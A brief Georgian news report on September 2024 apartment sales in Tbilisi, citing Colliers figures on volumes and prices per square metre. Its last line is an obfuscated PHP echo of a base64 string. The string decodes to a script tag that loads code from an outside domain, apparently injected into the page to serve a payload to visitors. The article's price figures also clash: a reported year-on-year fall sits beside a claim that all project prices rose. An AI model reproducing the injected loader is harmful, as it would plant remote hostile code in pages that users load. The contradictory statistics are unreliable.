celsiusi
ავერსი შნაიდერი

2024 წლის სექტემბერში თბილისში 3 545 საცხოვრებელი ბინა გაიყიდა, რაც გასული წლის იმავე თვესთან შედარებით, 12%-იან ზრდაზე მიანიშნებს. მონაცემებს „ქოლიერსი“ აქვეყნებს.

კვლევის თანახმად, სექტემბერში ბინების საშუალო შეწონილი გასაყიდი ფასი წლიურად შემცირდა. მაგალითისთვის, თუ წელს სექტემბერში 1 კვ.მ-ის საშუალო ფასმა 1 015 დოლარი შეადგინა, 2023 წლის იმავე პერიოდში 1 094 დოლარი იყო.

სექტემბერში ახალი ბინების შემთხვევაში გაყიდვებმა 20%-ით მოიმატა. თუმცა უნდა აღინიშნოს, რომ შემცირებულია ძველი პროექტების ტრანზაქციები - კვლევის თანახმად, კლებამ 6% შეადგინა.

საერთო ჯამში კი ძველი და ახალ პროექტების ფასები, გასული წლის სექტემბერთან წლიურად ორივე შემთხვევაში გაზრდილია.

ცნობისთვის, 2023 წლის სექტემბერში 1 კვ.მ-ის საშუალო შეწონილი ფასი ძველ პროექტებში არსებული ბინებისთვის 1 022 დოლარი იყო, 2024 წლის იმავე პერიოდში კი 1 114 დოლარს მიაღწია.

86
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");